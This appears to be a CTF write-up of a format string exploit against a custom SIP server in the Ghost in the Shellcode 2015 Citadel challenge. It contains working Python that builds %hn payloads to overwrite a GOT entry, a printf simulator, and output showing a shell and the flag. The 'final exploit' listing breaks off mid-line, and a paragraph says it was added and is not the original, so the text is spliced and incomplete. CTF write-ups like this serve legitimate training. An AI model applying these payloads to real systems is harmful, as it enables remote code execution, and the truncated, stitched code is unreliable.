This is my exploit for the Citadel challenge in the Ghost in The Shellcode 2015 Teaser CTF. I have attached my IDB as well, so those of you with IDA Pro can see what the reversing-part of the process looked like.
The Citadel challenge consisted of a custom SIP server (Linux/x86_64) with NX, ASLR and partial RELRO enabled. After some time reverse-engineering the binary, I discovered a format string vulnerability in a call to asprintf(). However, to use it effectively I first had to get data under my control onto the stack, where printf-style functions fetch their arguments from, and that took some further digging…
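To make the stack requirement concrete, here is a constructed example of the write primitive a format string bug gives you once your buffer sits at a known printf argument index. It is added here and is not the original exploit: it builds a 64-bit write out of four %hn writes, puts the target addresses at the end of the payload (their NUL bytes would otherwise end the string), and includes a small printf model so the payload can be checked offline. The GOT slot 0x601020, the value 0x7ffff7a5d4e0, the stack offset 10 and the `written` prefix length are assumed placeholders; the real values come from the binary and from %N$p probing.

```python
import re
import struct

# Matches one "%<pad>c%<idx>$hn" pair of the payloads built below.
FMT_RE = re.compile(rb"%(\d+)c%(\d+)\$hn")


def split_words(addr, value):
    """Split a 64-bit value into four little-endian 16-bit (word, address)
    pairs, sorted by word so the running character count only has to grow."""
    words = [((value >> (16 * i)) & 0xFFFF, addr + 2 * i) for i in range(4)]
    return sorted(words)


def build_fmt(words, first_idx, written):
    """Emit one '%<pad>c%<idx>$hn' pair per word. first_idx is the printf
    argument index of the first address slot after the format part; written
    is how many bytes the target has already printed before our buffer."""
    fmt = b""
    count = written
    for i, (word, _addr) in enumerate(words):
        pad = (word - count) % 0x10000
        if pad == 0:
            pad = 0x10000  # %c prints at least one byte; wrap the short instead
        fmt += b"%%%dc%%%d$hn" % (pad, first_idx + i)
        count += pad
    return fmt


def build_payload(words, offset, written=0):
    """One format string that performs every write in `words`. The argument
    indices depend on the length of the format part, which depends on the
    indices, so iterate until the 8-byte-padded length is stable."""
    fmt_len = 0
    for _ in range(16):
        first_idx = offset + fmt_len // 8
        fmt = build_fmt(words, first_idx, written)
        padded = (len(fmt) + 7) // 8 * 8
        if padded == fmt_len:
            break
        fmt_len = padded
    else:
        raise ValueError("format part did not converge")
    addrs = b"".join(struct.pack("<Q", a) for _, a in words)
    return fmt.ljust(fmt_len, b"A") + addrs


def fmt_write_payloads(addr, value, offset, written=0, writes_per_payload=4):
    """Payloads that write `value` to `addr`. Use writes_per_payload=1 when
    the service copies the input as a C string: only the first address
    survives its NUL bytes, so each request then carries a single write."""
    words = split_words(addr, value)
    return [build_payload(words[i:i + writes_per_payload], offset, written)
            for i in range(0, len(words), writes_per_payload)]


def simulate(payloads, offset, written=0):
    """Constructed printf model (%c/%hn only, x86_64 little-endian): returns
    the 16-bit writes each payload would perform as {address: word}."""
    mem = {}
    for p in payloads:
        count, pos = written, 0
        while pos < len(p):
            m = FMT_RE.match(p, pos)
            if m:
                pad, idx = int(m.group(1)), int(m.group(2))
                count += pad
                slot = (idx - offset) * 8  # where that argument lies in our buffer
                target = struct.unpack_from("<Q", p, slot)[0]
                mem[target] = count & 0xFFFF
                pos = m.end()
            elif p[pos] == 0:
                break  # a NUL byte ends the format string
            else:
                count += 1  # any other byte is printed literally
                pos += 1
    return mem


def reconstruct(mem, addr):
    """Assemble the four words written at addr..addr+6 back into a value."""
    return sum(mem[addr + 2 * i] << (16 * i) for i in range(4))


if __name__ == "__main__":
    # Hypothetical target: a GOT entry (writable under partial RELRO) and a
    # libc address to drop into it; offset 10 is an assumed %N$p probe result.
    for p in fmt_write_payloads(0x601020, 0x7FFFF7A5D4E0, 10):
        print(p)
    print(hex(reconstruct(simulate(fmt_write_payloads(0x601020, 0x7FFFF7A5D4E0, 10), 10), 0x601020)))
```

The sorted-words trick keeps every pad below 0x10000, so the whole write costs at most a few hundred KB of output; with `writes_per_payload=1` each request is independent and the same `offset` and `written` apply to every one of them.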
My final exploit code:
```python
#!/usr/bin/python
#
# Exploit for the Citadel challenge from the Ghost in the Shellcode 2015 Teaser CTF.
#
# Joel Eriksson, 2014

import telnetlib
import struct
import socket
import sys

u64 = lambda x: struct.pack("
```

Below you can see the output of the exploit. :)
```
je@tiny:~$ ./citadel-xpl.py
uid=1000(citadel) gid=1000(citadel) groups=1000(citadel)
Linux ip-10-101-192-40 3.13.0-43-generic #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
key{Should have used boost::format}
```

The vulnerable binary:

http://www.clevcode.org/files/citadel

My IDB for the binary:
http://www.clevcode.org/files/citadel.i64